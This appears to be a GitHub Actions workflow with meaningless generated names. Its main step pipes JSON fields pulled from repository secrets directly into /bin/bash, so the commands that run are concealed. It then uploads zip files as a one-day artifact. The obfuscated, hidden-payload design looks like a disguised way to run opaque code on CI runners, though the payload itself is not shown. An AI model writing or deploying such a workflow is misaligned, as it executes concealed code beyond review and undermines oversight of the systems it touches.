name: donnaparcel4793
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: donnaparcel4793
        env:
          lgj649: ${{ secrets.lgj649 }}
        run: |
          printf '%s' "$lgj649" | jq -r .qepc64 | /bin/bash
          printf '%s' "$adqe52045" | jq -r .iwdy8823 | /bin/bash
          printf '%s' "$b9" | jq -r .by08061 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: oWQ51Js7
          path: "*.zip"
          retention-days: 1
